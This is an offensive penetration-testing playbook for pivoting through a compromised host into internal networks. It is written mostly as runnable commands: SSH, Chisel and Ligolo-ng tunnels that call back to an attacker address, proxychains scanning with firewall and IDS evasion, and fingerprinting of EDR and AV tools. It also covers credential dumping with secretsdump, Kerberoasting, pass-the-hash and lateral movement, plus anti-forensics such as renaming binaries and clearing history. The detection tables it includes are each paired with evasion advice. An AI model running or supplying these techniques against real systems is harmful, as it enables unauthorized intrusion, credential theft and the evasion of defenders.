3. Authenticated_Pivot
Scenario 3: Authenticated Pivot — SSH / Chisel / Ligolo-ng SOCKS
Position: Authenticated, on the network, pivoting through a compromised host
Goal: Scan and attack internal segments through SSH -D / Chisel / Ligolo-ng tunnels via proxychains
Visual Overview
graph LR
subgraph "Attack Box"
A[Your Machine
proxychains + tools]
end
subgraph "Pivot Host (Compromised)"
B[SSH -D / Chisel / Ligolo
SOCKS Proxy]
end
subgraph "Internal Network (Target)"
C[Domain Controller]
D[File Server]
E[Database Server]
F[Workstations]
end
A -->|"SOCKS5 127.0.0.1:1080"| B
B --> C & D & E & F
style A fill:#ff6600
style B fill:#ffaa00,stroke:#ff0000,stroke-width:3px
style C fill:#00ff00This is where proxychains matters most. Every command you run goes:
Your tool → proxychains → SOCKS proxy → Pivot host → Target
Every hop adds forensic evidence. Every connection is logged twice.
1. Tunnel Setup Methods
1.1 SSH Dynamic Port Forward (Most Common)
# Basic SOCKS5 proxy through compromised host
ssh -D 1080 -N -f -C user@PIVOT_IP
# Flags:
# -D 1080 Create SOCKS5 proxy on localhost:1080
# -N No command execution (tunnel only)
# -f Background the session
# -C Compress traffic (reduces bandwidth)
# With key file
ssh -D 1080 -N -f -i /path/to/key user@PIVOT_IP
# Jump host (multi-hop)
ssh -J user@HOP1 -D 1080 -N -f user@HOP2
What Gets Logged:
| Location | Log | Evidence |
|---|---|---|
| Pivot host | /var/log/auth.log |
SSH login from YOUR_IP |
| Pivot host | sshd process |
-D flag visible in ps aux |
| Pivot host | Network connections | Outbound connections to internal targets |
| Target | Service logs | Connection from PIVOT_IP (not your IP) |
| Network | Flow data | SSH session YOUR_IP → PIVOT_IP, then PIVOT_IP → targets |
OPSEC Hardening:
# Hide SSH tunnel from process listing
ssh -D 1080 -N -f -o "ServerAliveInterval=60" -o "ServerAliveCountMax=3" user@PIVOT_IP
# Still visible in ps — but looks like normal SSH session
# Use non-standard SSH port (if available)
ssh -D 1080 -N -f -p 2222 user@PIVOT_IP
1.2 Chisel (Reverse SOCKS — No SSH Required)
# On YOUR machine (server):
chisel server -p 8080 --reverse
# On PIVOT host (client):
./chisel client YOUR_IP:8080 R:socks
# Creates SOCKS5 proxy on YOUR machine at 127.0.0.1:1080
What Gets Logged:
| Location | Log | Evidence |
|---|---|---|
| Pivot host | Process list | chisel client binary running |
| Pivot host | Disk (if not in-memory) | chisel binary on disk → AV/EDR detection |
| Pivot host | Network | Outbound HTTP/WebSocket to YOUR_IP:8080 |
| Network | Flow/IDS | WebSocket traffic on port 8080, continuous connection |
| Target | Service logs | Connection from PIVOT_IP |
OPSEC Hardening:
# Rename chisel binary to blend in
cp chisel /tmp/svchost.exe # Windows
cp chisel /tmp/systemd-helper # Linux
# Use HTTPS (encrypted tunnel)
chisel server -p 443 --reverse --tls-key key.pem --tls-cert cert.pem
./chisel client --tls-skip-verify YOUR_IP:443 R:socks
# Use common ports (80, 443, 8443) to blend with normal traffic
1.3 Ligolo-ng (Kernel-Level Tunnel — No SOCKS Needed)
# On YOUR machine (proxy):
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:443
# On PIVOT host (agent):
./agent -connect YOUR_IP:443 -ignore-cert
# In ligolo console:
ligolo-ng » session
[Agent] » autoroute
# Adds routes for internal subnets through tun interface
# NO PROXYCHAINS NEEDED — scan directly!
nmap -sT -Pn -n --top-ports 100 INTERNAL_SUBNET/24
Why Ligolo-ng > Proxychains:
- Kernel-level routing = tools work natively (no
-sTrequirement) - No SOCKS overhead
- Faster scanning
- UDP works (SOCKS only supports TCP)
- DNS works natively
What Gets Logged:
| Location | Log | Evidence |
|---|---|---|
| Pivot host | Process list | agent binary running |
| Pivot host | Network | TLS connection to YOUR_IP:443 |
| Network | Flow/IDS | Persistent TLS tunnel, unusual traffic volume |
| Target | Service logs | Connection from PIVOT_IP |
1.4 sshuttle (Transparent Proxy — No Proxychains)
# Route specific subnets through SSH (VPN-like)
sshuttle -r user@PIVOT_IP 10.10.10.0/24 172.16.0.0/16
# With SSH key
sshuttle -r user@PIVOT_IP --ssh-cmd 'ssh -i id_rsa' 10.10.10.0/24
# Auto-detect subnets (sends all traffic)
sshuttle -vNr user@PIVOT_IP
# Exclude your current subnet
sshuttle -r user@PIVOT_IP 10.10.10.0/24 -x YOUR_SUBNET/24
Advantages: No proxychains needed, all tools work natively, supports DNS forwarding.
Disadvantages: Requires Python on pivot, creates iptables rules on attack box.
2. Proxychains Configuration for Pivoting
2.1 Standard Config
cat > /etc/proxychains4.conf << 'EOF'
# OPSEC-optimized configuration
strict_chain
quiet_mode
proxy_dns
# Timeout tuning (internal networks are fast)
tcp_read_time_out 8000
tcp_connect_time_out 5000
[ProxyList]
socks5 127.0.0.1 1080
EOF
2.2 Double Pivot Config
# Attacker → Pivot1 → Pivot2 → Target
# SSH hop 1: ssh -D 1080 user@PIVOT1
# SSH hop 2 (from Pivot1): ssh -D 9999 user@PIVOT2
cat > /etc/proxychains4.conf << 'EOF'
strict_chain
quiet_mode
proxy_dns
[ProxyList]
socks5 127.0.0.1 1080 # First hop
socks5 127.0.0.1 9999 # Second hop (Pivot1 → Pivot2)
EOF
# Alternative: SSH ProxyJump (single command)
ssh -J user@PIVOT1 -D 1080 -N -f user@PIVOT2
# Single SOCKS proxy, traffic routes: You → Pivot1 → Pivot2 → Target
2.3 Multiple Independent Tunnels
# Different tunnels for different targets
# Tunnel 1: SSH to DMZ pivot
ssh -D 1080 -N -f user@DMZ_PIVOT
# Tunnel 2: Chisel to internal pivot
chisel server -p 9090 --reverse # Internal pivot connects back
# Switch between tunnels by changing proxychains config
# or use proxychains -f for per-command config:
proxychains -q -f /tmp/dmz_proxy.conf nmap -sT -Pn 10.0.0.0/24
proxychains -q -f /tmp/internal_proxy.conf nmap -sT -Pn 172.16.0.0/24
3. What Proxychains Does to Your Traffic
3.1 Traffic Flow Analysis
WITHOUT proxychains (Ligolo/sshuttle):
┌─────────┐ ┌──────────┐ ┌────────┐
│ nmap │────►│ Pivot │────►│ Target │
│ (native) │ │ (tunnel) │ │ │
└─────────┘ └──────────┘ └────────┘
Full TCP stack Full TCP stack
(SYN scan works) (native connection)
WITH proxychains (SSH -D / Chisel):
┌─────────┐ ┌───────────────┐ ┌──────────┐ ┌────────┐
│ nmap │────►│ proxychains │────►│ SOCKS │────►│ Target │
│ (-sT!) │ │ (LD_PRELOAD) │ │ Proxy │ │ │
└─────────┘ └───────────────┘ └──────────┘ └────────┘
TCP Connect Hijacks connect() Relays TCP Sees Pivot IP
ONLY to SOCKS proxy connection
3.2 What You LOSE Through SOCKS/Proxychains
| Capability | Direct | Through Proxychains | Workaround |
|---|---|---|---|
SYN scan (-sS) |
✅ | ❌ Fails silently | Use -sT (TCP Connect) |
UDP scan (-sU) |
✅ | ❌ SOCKS = TCP only | Upload nmap to pivot, scan locally |
| ICMP ping | ✅ | ❌ No ICMP through SOCKS | Use -Pn (assume host up) |
OS detection (-O) |
✅ | ⚠️ Unreliable | Run from pivot directly |
| Traceroute | ✅ | ❌ | Run from pivot |
| Raw packets | ✅ | ❌ | Use Ligolo-ng instead |
| Speed | Fast | Slow (SOCKS overhead) | Batch scans, parallel threads |
3.3 Forensic Evidence Created
On YOUR Attack Box:
# Process artifacts:
ps aux | grep proxychains
# proxychains4 -q nmap -sT -Pn -n ...
# Library artifacts:
cat /proc/PID/maps | grep proxychains
# /usr/lib/libproxychains.so loaded in nmap's address space
# Config artifacts:
/etc/proxychains4.conf # Reveals SOCKS proxy config
~/.proxychains/ # User-specific config
# History artifacts:
.bash_history # proxychains commands
On Pivot Host:
# SSH artifacts:
/var/log/auth.log # SSH session from YOUR_IP
who / w # Active SSH sessions
ss -tnp # TCP connections to internal targets
ps aux | grep ssh # sshd process with -D flag
# Chisel artifacts:
ps aux | grep chisel # Chisel process
/tmp/ or /dev/shm/ # Binary location
ss -tnp | grep chisel # WebSocket connection to YOUR_IP
# Network connections:
ss -tn state established # Every internal connection visible
# Each proxychains connection = new TCP connection FROM pivot
On Target:
# Target sees PIVOT_IP, not YOUR IP
# Windows Event 4624: Logon from PIVOT_IP
# Web server logs: Connection from PIVOT_IP
# Firewall logs: Connection from PIVOT_IP
4. Scanning Through Pivot
4.1 Host Discovery
# CRITICAL: Always use -sT -Pn -n through proxychains
# -sT TCP Connect (only scan type that works through SOCKS)
# -Pn Skip ping (ICMP doesn't work through SOCKS)
# -n No DNS resolution (prevents leaks)
# Quick SMB sweep (find Windows hosts)
proxychains -q nmap -sT -Pn -n -p 445 --open INTERNAL_SUBNET/24
# AD service discovery (find DCs)
proxychains -q nmap -sT -Pn -n -p 88,389,636 --open INTERNAL_SUBNET/24
# Top-20 ports
proxychains -q nmap -sT -Pn -n --top-ports 20 --open INTERNAL_SUBNET/24
# Single host deep scan
proxychains -q nmap -sT -Pn -n -sV --version-intensity 2 -p- TARGET_IP
4.2 Parallel Scanning (Faster)
# xargs parallel scanning (much faster than nmap through proxychains)
seq 1 254 | xargs -P 20 -I{} proxychains -q nmap -sT -Pn -n \
--top-ports 20 --open -oG /tmp/scan_{}.gnmap 10.10.10.{}
# Or use a purpose-built script
for target in $(cat targets.txt); do
proxychains -q nmap -sT -Pn -n -p 22,80,135,445,3389,5985 \
--open -oG /tmp/scan_$(echo $target | tr '.' '_').gnmap $target &
# Limit parallel jobs
[ $(jobs -r | wc -l) -ge 10 ] && wait -n
done
wait
4.3 Nmap Firewall Evasion Through Pivot
When scanning through compromised hosts, additional firewall evasion may be needed:
# Fragmentation (split packets to evade inspection)
proxychains -q nmap -sT -Pn -n -f TARGET_IP
proxychains -q nmap -sT -Pn -n -f -f TARGET_IP # Double fragmentation
# Source port manipulation (appear as common service)
proxychains -q nmap -sT -Pn -n --source-port 53 TARGET_IP # DNS
proxychains -q nmap -sT -Pn -n --source-port 80 TARGET_IP # HTTP
proxychains -q nmap -sT -Pn -n --source-port 443 TARGET_IP # HTTPS
# Decoy scanning (hide real source among noise)
# NOTE: Only source IPs visible will be the pivot host
proxychains -q nmap -sT -Pn -n -D RND:10 TARGET_IP # 10 random decoys
# Timing evasion (slow scan to avoid rate limiting)
proxychains -q nmap -sT -Pn -n -T1 TARGET_IP # Paranoid (5+ min)
proxychains -q nmap -sT -Pn -n -T2 --scan-delay 5s TARGET_IP # Polite with delay
# Combined evasion (maximum stealth through pivot)
proxychains -q nmap -sT -Pn -n -f -T2 --source-port 443 \
--scan-delay 3s --max-retries 1 --version-intensity 2 TARGET_IP
# Data length randomization (vary packet sizes)
proxychains -q nmap -sT -Pn -n --data-length 32 TARGET_IP # Add 32 bytes padding
Evasion Effectiveness Through Pivot:
| Technique | Firewall Evasion | IDS Evasion | OPSEC Risk | Notes |
|---|---|---|---|---|
| Fragmentation | 🟢 Good | 🟡 Medium | 🟡 Medium | Some FW reassemble, unusual traffic |
| Source port | 🟢 Good | 🟢 Good | 🟢 Low | Appears as legitimate service |
| Timing delays | 🟢 Good | 🟢 Excellent | 🟢 Low | Blends with normal traffic |
| Data padding | 🟡 Medium | 🟡 Medium | 🟢 Low | Changes packet signatures |
4.5 EDR/AV Detection on Target Systems
Before deep enumeration, identify security products to tailor OPSEC:
# Comprehensive EDR/AV identification (run through WinRM/evil-winrm)
# Execute via: proxychains -q evil-winrm -i TARGET -u USER -p PASS
# Process-based detection
Get-Process | Where-Object {$_.ProcessName -match
"crowdstrike|carbon|cylance|defender|mcafee|kaspersky|sentinel|
cybereason|endgame|fireeye|sophos|trend|symantec|avast|avg|eset|
bitdefender|malware|virus|security"} |
Select ProcessName, Id, Path | Format-Table
# Service-based detection
Get-Service | Where-Object {$_.DisplayName -match
"windows defender|mcafee|norton|kaspersky|avast|avg|eset|sophos|
trend|symantec|carbon|cylance|crowdstrike|sentinel|cybereason|
fireeye|endgame|malwarebytes|bitdefender"} |
Select Name, DisplayName, Status | Format-Table
# Registry key detection (common AV/EDR locations)
$RegPaths = @(
"HKLM:\SOFTWARE\CrowdStrike",
"HKLM:\SOFTWARE\McAfee",
"HKLM:\SOFTWARE\Malwarebytes",
"HKLM:\SOFTWARE\Sophos",
"HKLM:\SOFTWARE\ESET",
"HKLM:\SOFTWARE\Kaspersky",
"HKLM:\SOFTWARE\CarbonBlack",
"HKLM:\SOFTWARE\Cylance",
"HKLM:\SOFTWARE\Microsoft\Windows Defender"
)
foreach($path in $RegPaths) {
if(Test-Path $path) {
Write-Host "[+] Found: $path" -ForegroundColor Red
Get-ItemProperty $path 2>$null | Format-List
}
}
# Driver detection (kernel-level EDR components)
Get-WmiObject Win32_SystemDriver | Where-Object {$_.Name -match
"crowd|carbon|cylance|defender|mcafee|kaspersky|sentinel|
cybereason|endgame|fireeye|sophos|trend|symantec"} |
Select Name, DisplayName, State, PathName | Format-Table
# Sysmon detection (high-fidelity logging)
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 1 2>$null
if($?) { Write-Host "[!] Sysmon is ACTIVE - High logging fidelity" -ForegroundColor Red }
# Windows Defender status
Get-MpComputerStatus 2>$null | Select-Object AntivirusEnabled,
RealTimeProtectionEnabled, BehaviorMonitorEnabled,
OnAccessProtectionEnabled, IoavProtectionEnabled | Format-List
# PowerShell logging detection
$PSLogging = Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\*" 2>$null
if($PSLogging) {
Write-Host "[!] PowerShell Enhanced Logging Enabled" -ForegroundColor Red
$PSLogging | Format-List
}
Common EDR/AV Identifiers:
| Product | Process Names | Services | Registry Keys |
|---|---|---|---|
| CrowdStrike Falcon | CsFalconService |
CsFalconService |
HKLM:\SOFTWARE\CrowdStrike |
| Carbon Black | CbDefense, RepMgr |
CarbonBlack |
HKLM:\SOFTWARE\CarbonBlack |
| Cylance | CylanceSvc |
CylanceSvc |
HKLM:\SOFTWARE\Cylance |
| Windows Defender | MsMpEng, NisSrv |
WinDefend, Sense |
HKLM:\SOFTWARE\Microsoft\Windows Defender |
| SentinelOne | SentinelAgent |
SentinelAgent |
HKLM:\SOFTWARE\SentinelOne |
| Sophos | SAVAdminService |
Sophos Agent |
HKLM:\SOFTWARE\Sophos |
| ESET | ekrn |
ESET Service |
HKLM:\SOFTWARE\ESET |
| Kaspersky | avp |
AVP |
HKLM:\SOFTWARE\Kaspersky |
4.6 Service Enumeration Through Pivot
# NetExec through proxy (most common use case)
proxychains -q netexec smb INTERNAL_SUBNET/24
proxychains -q netexec smb TARGET -u USER -p PASS --shares
proxychains -q netexec smb TARGET -u USER -p PASS --users
proxychains -q netexec winrm TARGET -u USER -p PASS
# Impacket through proxy
proxychains -q GetUserSPNs.py domain.local/user:pass -dc-ip DC_IP -request
proxychains -q GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -dc-ip DC_IP
proxychains -q secretsdump.py domain.local/user:pass@TARGET
# BloodHound stealth collection through proxy
# Standard collection (all data, LOUD)
proxychains -q bloodhound-python -d domain.local -u user -p pass -gc DC_IP -c all
# Stealth collection (DCOnly + throttling)
proxychains -q bloodhound-python -d domain.local -u user -p pass -gc DC_IP \
-c DCOnly --throttle-delay 5 --jitter 20
# Session collection only (quieter, limited data)
proxychains -q bloodhound-python -d domain.local -u user -p pass -gc DC_IP \
-c Session --throttle-delay 10
# Collection method breakdown:
# DCOnly - Domain Controller enumeration only (computers, users, groups)
# Session - Active session enumeration (RPC calls to each computer)
# Group - Group membership enumeration
# LocalAdmin - Local admin enumeration (admin relationships)
# RDP - RDP access rights enumeration
# DCOM - DCOM access rights enumeration
# PSRemote - PowerShell remoting access enumeration
# Trusts - Domain trust enumeration
# Container - OU and container enumeration
# Lateral movement through proxy
proxychains -q wmiexec.py domain.local/user:pass@TARGET # WMI (quieter)
proxychains -q atexec.py domain.local/user:pass@TARGET # Scheduled task
proxychains -q dcomexec.py domain.local/user:pass@TARGET # DCOM
proxychains -q psexec.py domain.local/user:pass@TARGET # PsExec (LOUD)
proxychains -q smbexec.py domain.local/user:pass@TARGET # SMB exec
proxychains -q evil-winrm -i TARGET -u USER -p PASS # WinRM
# RDP through proxy
proxychains -q xfreerdp /u:USER /p:PASS /v:TARGET /dynamic-resolution
# Pass-the-Hash through proxy
proxychains -q netexec smb TARGET -u USER -H NTLM_HASH
proxychains -q wmiexec.py domain.local/user@TARGET -hashes :NTLM_HASH
proxychains -q psexec.py domain.local/user@TARGET -hashes LM:NTLM
4.7 Command Execution OPSEC Through Pivot
Noisy vs Quiet Command Alternatives
When executing commands on compromised systems through pivot tunnels, choose quieter alternatives:
System Information Commands
| Noisy Commands | Quiet Alternatives | OPSEC Benefit |
|---|---|---|
systeminfo |
Get-ComputerInfo | Select-Object WindowsProductName, TotalPhysicalMemory |
Specific queries vs full system dump |
wmic computersystem get * |
(Get-WmiObject Win32_ComputerSystem).Name |
Targeted WMI vs wildcard query |
net config workstation |
$env:COMPUTERNAME |
Environment variable vs network config |
whoami /all |
whoami; whoami /priv |
Split queries, avoid full token dump |
tasklist /v |
Get-Process | Where-Object {$_.CPU -gt 0} | Select Name, Id |
Filter active processes only |
User and Group Enumeration
| Noisy Commands | Quiet Alternatives | OPSEC Benefit |
|---|---|---|
net user |
Get-LocalUser | Select Name, Enabled |
PowerShell vs net.exe |
net user /domain |
Get-ADUser -Filter * -Properties Name | Select Name |
Targeted AD query vs full enumeration |
net group /domain |
Get-ADGroup -Filter {GroupCategory -eq "Security"} |
Security groups only |
net localgroup administrators |
Get-LocalGroupMember Administrators |
PowerShell cmdlet vs net command |
wmic useraccount get * |
Get-WmiObject Win32_UserAccount | Select Name, Disabled |
Specific properties only |
Network Enumeration
| Noisy Commands | Quiet Alternatives | OPSEC Benefit |
|---|---|---|
netstat -an |
Get-NetTCPConnection -State Established | Select LocalPort, RemoteAddress |
Active connections only |
arp -a |
Get-NetNeighbor | Where-Object {$_.State -eq "Reachable"} |
Reachable hosts only |
nbtstat -A TARGET |
Resolve-DnsName TARGET -Type A -QuickTimeout |
DNS resolution vs NetBIOS |
ping -n 1 TARGET |
Test-NetConnection TARGET -InformationLevel Quiet |
Suppress verbose output |
nslookup |
Resolve-DnsName -Name TARGET -Server DNS_SERVER |
Specific DNS queries |
File and Share Discovery
| Noisy Commands | Quiet Alternatives | OPSEC Benefit |
|---|---|---|
net view \\TARGET |
Get-SmbShare -CimSession TARGET | Select Name |
WMI vs SMB browser |
dir C:\ /s |
Get-ChildItem C:\ -Directory | Select Name |
Directories only, no recursion |
tree C:\ |
Get-ChildItem C:\ -Recurse -Directory -Depth 2 |
Limited depth traversal |
findstr /s /i "password" C:\* |
Select-String -Path "C:\Users\*\*.txt" -Pattern "password" |
Targeted file types |
forfiles /s /m *.log |
Get-ChildItem -Path C:\ -Filter "*.log" -File -Recurse -ErrorAction SilentlyContinue | Select-Object -First 10 |
Limited results |
Process and Service Information
| Noisy Commands | Quiet Alternatives | OPSEC Benefit |
|---|---|---|
tasklist /svc |
Get-Process | Where-Object {$_.ProcessName -match "svc|service"} |
Filter service-related only |
sc query |
Get-Service | Where-Object {$_.Status -eq "Running"} | Select Name |
Running services only |
wmic service get * |
Get-WmiObject Win32_Service | Select Name, State, StartMode | Where-Object {$_.State -eq "Running"} |
Running services, specific fields |
netstat -b |
Get-Process -Id (Get-NetTCPConnection | Select-Object OwningProcess) | Select ProcessName |
Process names for connections |
wmic process get * |
Get-Process | Select ProcessName, Id, CPU | Sort-Object CPU -Descending | Select-Object -First 5 |
Top 5 processes by CPU |
Command Execution Phasing and Timing
Execute commands in phases with strategic delays to avoid detection:
Phase 1: Initial Reconnaissance (First 0-30 minutes)
Timing: Every 30-60 seconds between commands
Focus: Basic system information without deep enumeration
# Phase 1 commands (run via evil-winrm through proxychains)
$env:COMPUTERNAME # System name
Get-Date # Current time
whoami # Current user
whoami /priv | findstr "SeDebug\|SeImpersonate" # Key privileges only
# Wait 45 seconds between each command
Start-Sleep 45
Get-Process | Where-Object {$_.ProcessName -match "defender|crowdstrike|carbon"} | Select ProcessName
Get-Service | Where-Object {$_.Status -eq "Running" -and $_.DisplayName -match "antivirus|security"} | Select Name
# Wait 60 seconds before Phase 2
Start-Sleep 60
Phase 2: Targeted Enumeration (30-90 minutes)
Timing: Every 2-5 minutes between command groups
Focus: Specific targets based on Phase 1 findings
# Phase 2 commands - More detailed but still targeted
Get-LocalGroupMember Administrators | Select Name # Admin users
Get-NetTCPConnection -State Established | Select LocalPort, RemoteAddress | Sort-Object RemoteAddress
# 3 minute delay between groups
Start-Sleep 180
# Domain enumeration (if domain-joined)
if((Get-WmiObject Win32_ComputerSystem).PartOfDomain) {
Get-ADUser -Filter {Enabled -eq $true} -Properties Name | Select Name | Select-Object -First 10
Get-ADGroup -Filter {GroupCategory -eq "Security"} | Select Name | Select-Object -First 5
}
# 5 minute delay before sensitive operations
Start-Sleep 300
Phase 3: Deep Enumeration (90+ minutes)
Timing: Every 5-15 minutes between operations
Focus: Detailed enumeration and privilege escalation preparation
# Phase 3 commands - Deep enumeration with long delays
# File system enumeration
Get-ChildItem C:\Users\ -Directory | Select Name
# 10 minute delay
Start-Sleep 600
# Share enumeration
Get-SmbShare | Where-Object {$_.Name -notmatch "IPC\$|ADMIN\$|C\$"} | Select Name, Path
# 15 minute delay before credential searches
Start-Sleep 900
# Credential file searches (high risk)
Get-ChildItem -Path "C:\Users\" -Include "*password*", "*cred*", "*.kdbx" -Recurse -ErrorAction SilentlyContinue | Select-Object -First 5
Timing Strategy Benefits:
| Timing Pattern | Detection Evasion | Operational Security |
|---|---|---|
| 30-60 second delays | Avoids burst detection | Mimics human interaction |
| 2-5 minute delays | Below automated alerting thresholds | Allows log rotation |
| 5-15 minute delays | Spreads IOCs across time windows | Reduces correlation risk |
| Phase-based execution | Different time signatures | Natural operational flow |
5. Detection Surface — Authenticated Pivot
5.1 Network-Level Detection
Blue Team sees:
┌──────────────────────────────────────────────────┐
│ Source: PIVOT_IP (10.10.10.50) │
│ Destination: 254 unique IPs in 10.10.10.0/24 │
│ Ports: 22, 80, 135, 445, 3389, 5985 │
│ Time: 14:23 - 14:28 (5 minutes) │
│ Pattern: Sequential IP sweep, multiple ports │
│ │
│ ALERT: Port scan from 10.10.10.50 │
│ SEVERITY: HIGH │
│ PIVOT_IP is a [webserver/workstation/etc] │
│ Why is it scanning the entire subnet? │
└──────────────────────────────────────────────────┘
Key Detection Indicators:
- Compromised host making connections it never made before
- Unusual outbound connection volume from a single host
- Sequential port/IP patterns from non-scanner host
- SSH session with
-Dflag (visible in process list) - Chisel WebSocket connection to external IP
5.2 Host-Level Detection (Pivot)
| Artifact | Location | EDR Detection |
|---|---|---|
| SSH tunnel process | ps aux |
Process monitoring |
| Chisel binary | /tmp/, /dev/shm/ |
File creation alert |
| Unusual network connections | ss -tn, netstat |
Connection monitoring |
| Outbound connection to C2 | Network flow | Known-bad IP / unusual port |
| Library injection (proxychains) | /proc/PID/maps |
Memory scanning |
5.3 IDS/SIEM Correlation
# Suricata rules that detect pivoting:
# SSH tunnel with port forwarding
alert ssh any any -> any 22 (msg:"ET SCAN SSH Tunnel Detected";
flow:to_server; content:"SSH-"; depth:4;
threshold:type both, track by_src, count 50, seconds 300;)
# WebSocket (Chisel) to unusual port
alert tcp any any -> any !80 !443 (msg:"Possible Chisel WebSocket Tunnel";
content:"Upgrade: websocket"; http_header;)
# Scanning from compromised host
alert tcp $HOME_NET any -> $HOME_NET any (msg:"Internal Host Port Scan";
flags:S; threshold:type both, track by_src, count 100, seconds 60;)
5.4 Sysmon Event Detection
Sysmon provides high-fidelity logging for pivot operations. Key events to be aware of:
| Event ID | Description | Pivot Detection | OPSEC Evasion |
|---|---|---|---|
| 1 | Process Creation | SSH/Chisel process launches | Use process renaming, in-memory execution |
| 2 | File Creation Time Change | Binary timestomping | Avoid file modification |
| 3 | Network Connection | All pivot tunnel connections | Use common ports (80, 443, 53) |
| 5 | Process Terminated | Tool cleanup detection | Normal process termination |
| 7 | Image Loaded | DLL injection (proxychains) | Use legitimate processes |
| 8 | CreateRemoteThread | Code injection detection | Avoid memory injection |
| 10 | Process Access | Memory access for injection | Use native Windows APIs |
| 11 | File Create | Tool/binary creation | Write to standard locations |
| 12 | Registry Object Add/Del | Persistence mechanisms | Avoid registry modifications |
| 13 | Registry Value Set | Config/setting changes | Use environment variables |
| 15 | File Create Stream | ADS file hiding | Avoid alternate data streams |
| 17 | Pipe Created | Named pipe communication | Use network sockets instead |
| 18 | Pipe Connected | Inter-process communication | Minimize IPC usage |
| 19 | WMI Event Filter | WMI persistence | Avoid WMI-based persistence |
| 20 | WMI Consumer | WMI event consumers | Use scheduled tasks instead |
| 21 | WMI Filter Consumer | WMI filter binding | Avoid WMI altogether |
| 22 | DNS Query | DNS resolution logging | Use IP addresses, /etc/hosts |
| 23 | File Delete | File deletion tracking | Overwrite instead of delete |
| 24 | Clipboard Change | Clipboard monitoring | Avoid clipboard usage |
| 25 | Process Tampering | Process hollowing detection | Use standard process execution |
| 26 | File Delete (Archived) | Deleted file recovery | Secure deletion methods |
| 27 | File Block Executable | Executable blocking | Sign binaries, use AllowLists |
| 28 | File Block Shredding | Secure file deletion | Multi-pass overwriting |
| 29 | File Executable Detected | Executable file creation | Use interpreters (PowerShell, Python) |
5.5 Windows Event Log Detection
Critical Windows events generated during pivot operations:
| Event ID | Log Source | Description | Pivot Context | OPSEC Impact |
|---|---|---|---|---|
| 4624 | Security | Successful Logon | WinRM/RDP through pivot | 🔴 HIGH - Every lateral move logged |
| 4625 | Security | Failed Logon | Password spraying attempts | 🔴 HIGH - Failed auth attempts |
| 4648 | Security | Logon with Explicit Credentials | RunAs, net use commands | 🟠 MED-HIGH - Credential usage |
| 4672 | Security | Admin Rights Assignment | Privilege escalation | 🔴 HIGH - Admin access granted |
| 4688 | Security | Process Creation | Command execution logging | 🟠 MED-HIGH - Every command logged |
| 4689 | Security | Process Termination | Tool cleanup | 🟡 MEDIUM - Process lifecycle |
| 4697 | Security | Service Install | Service creation for persistence | 🔴 HIGH - Service-based persistence |
| 4698 | Security | Scheduled Task Created | Task-based persistence | 🟠 MED-HIGH - Scheduled persistence |
| 4720 | Security | User Account Created | Account creation | 🔴 HIGH - New user accounts |
| 4738 | Security | User Account Changed | Account modifications | 🟠 MED-HIGH - Account tampering |
| 4756 | Security | Member Added to Security Group | Privilege escalation | 🔴 HIGH - Group membership changes |
| 5140 | Security | Network Share Access | SMB share enumeration | 🟡 MEDIUM - Share access |
| 5156 | Security | Windows Firewall Connection | Network connections | 🟡 MEDIUM - Firewall allows |
| 7034 | System | Service Crashed | Service manipulation | 🟠 MED-HIGH - Service instability |
| 7035 | System | Service Control Manager | Service start/stop | 🟡 MEDIUM - Service lifecycle |
| 7036 | System | Service Status Change | Service state changes | 🟡 MEDIUM - Service modifications |
| 7040 | System | Service Startup Type Changed | Service configuration | 🟠 MED-HIGH - Persistence setup |
| 7045 | System | Service Installation | New service installed | 🔴 HIGH - Service-based backdoors |
High-Risk Event Combinations:
- 4624 + 4688: Successful logon followed by process execution (lateral movement)
- 4648 + 5140: Explicit credential use for share access (credential abuse)
- 4697 + 7045: Service installation events (service persistence)
- 4720 + 4756: Account creation and group addition (admin account creation)
6. OPSEC Best Practices
6.1 Scanning Discipline
# ❌ BAD: Full subnet blast
proxychains -q nmap -sT -Pn -n -p- 10.10.10.0/24
# 254 hosts × 65535 ports = 16.6 MILLION connections through pivot
# ✅ GOOD: Targeted, phased approach
# Phase 1: Find alive hosts (single port)
proxychains -q nmap -sT -Pn -n -p 445 --open 10.10.10.0/24
# Phase 2: Enum discovered hosts
proxychains -q nmap -sT -Pn -n --top-ports 20 --open -iL alive_hosts.txt
# Phase 3: Deep scan high-value targets only
proxychains -q nmap -sT -Pn -n -sV -p- HIGH_VALUE_TARGET
# Add timing controls
proxychains -q nmap -sT -Pn -n -T2 --scan-delay 3s --max-retries 1 ...
6.2 Tunnel Hardening
# SSH: Use ControlMaster for session reuse (fewer auth events)
ssh -D 1080 -N -f -o "ControlMaster=auto" -o "ControlPath=/tmp/ssh_%h_%p_%r" user@PIVOT
# Chisel: Use TLS + common port
chisel server -p 443 --reverse --tls-key key.pem --tls-cert cert.pem
# Ligolo-ng: Already uses TLS, use port 443
./proxy -selfcert -laddr 0.0.0.0:443
# Clean up after: Kill tunnel, remove artifacts
kill $(pgrep -f "ssh.*-D.*1080")
ssh user@PIVOT "rm -f /tmp/chisel; history -c"
6.3 Avoid Common Mistakes
| Mistake | Detection | Fix |
|---|---|---|
| Leave tunnel running 24/7 | Persistent connection anomaly | Tear down when not scanning |
| Scan with default nmap timing | 100+ connections/sec from single host | Use -T2, --scan-delay |
Use -sS through proxychains |
Scan fails silently, you miss results | Always -sT |
Forget -Pn |
ICMP fails, hosts appear "down" | Always -Pn through SOCKS |
Forget -n |
DNS queries from pivot host | Always -n |
| Leave chisel binary on disk | AV/EDR detects tool | Run from memory, delete after |
| Use default SOCKS port (1080) | Known proxy port, IDS signature | Use random high port |
7. OPSEC Risk Matrix — Authenticated Pivot
| Technique | Risk | Pivot Evidence | Target Evidence | Network Evidence |
|---|---|---|---|---|
| SSH -D SOCKS | 🟡 MEDIUM | SSH session, -D in process |
Connection from Pivot IP | SSH traffic to/from pivot |
| Chisel reverse SOCKS | 🟡 MEDIUM | Binary on disk, WebSocket | Connection from Pivot IP | WebSocket tunnel |
| Ligolo-ng | 🟡 MEDIUM | Agent binary, TLS tunnel | Connection from Pivot IP | TLS tunnel to external |
| sshuttle | 🟢 LOW-MED | SSH session, iptables rules | Connection from Pivot IP | Only SSH traffic visible |
| Single port check | 🟢 LOW | 1 outbound connection | 1 connection log | Minimal |
| Top-20 scan | 🟡 MEDIUM | 20 connections per target | Multiple service logs | Pattern detectable |
